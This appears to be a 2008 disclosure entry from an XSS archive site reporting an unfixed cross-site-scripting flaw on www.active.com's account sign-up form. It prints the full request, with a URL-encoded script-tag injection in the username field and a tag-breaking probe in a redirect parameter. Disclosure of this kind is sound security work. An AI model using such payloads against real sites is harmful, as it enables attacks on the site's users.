Security researcher Uber0n, has submitted on 11/05/2008 a cross-site-scripting (XSS) vulnerability affecting www.active.com, which at the time of submission ranked 4620 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/05/2008 |
Date published: 11/05/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Uber0n |
Domain: www.active.com |
Category: XSS |
Pagerank: 4620 |
URL: https://www.active.com/user_join.cfm?lt=_c502CFB98-FC6D-F852-0617-CB945EFFF6A8_k99C7287D-E326-6706-E BB8-0BED1FE6FEE7&partner=&header=&eventId= |
POST: returnTo=%2Fsearch%2Forg_browse.cfm%3FORG%3Dwawa%2522%253E%2527%253E%253Cu%253Exx%2527%2522%26CHECKS SO%3D0&createAccount=1&form_user_id=&user_active_id=&user_in_aus=1&user_account_active_id=&user_emai l_active_id=&user_day_phone_active_id=&user_evening_phone_active_id=&address_id=&address_active_id=& current_display_name=&user_permissions_hidden=&topCountries=13%2C38%2C153%2C223&ua_username=%22%3E%2 7%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&ua_password=&ua_password_repeat=&user_display_name=&us er_fname=&user_mname=&user_lname=&user_dob_month=8&user_dob_day=7&user_dob_year=1988&user_day_phone= xxx-xxx-xxxx&user_day_ext=&user_evening_phone=&user_evening_ext=&address_1=&address_2=&address_city= &address_frn_country_id=223&address_frn_state_id=&address_intl_state=&address_zip=&user_domain_id=1& subscribe=1&agreeMinAge=yes |
Click here to view the mirror
|
|
|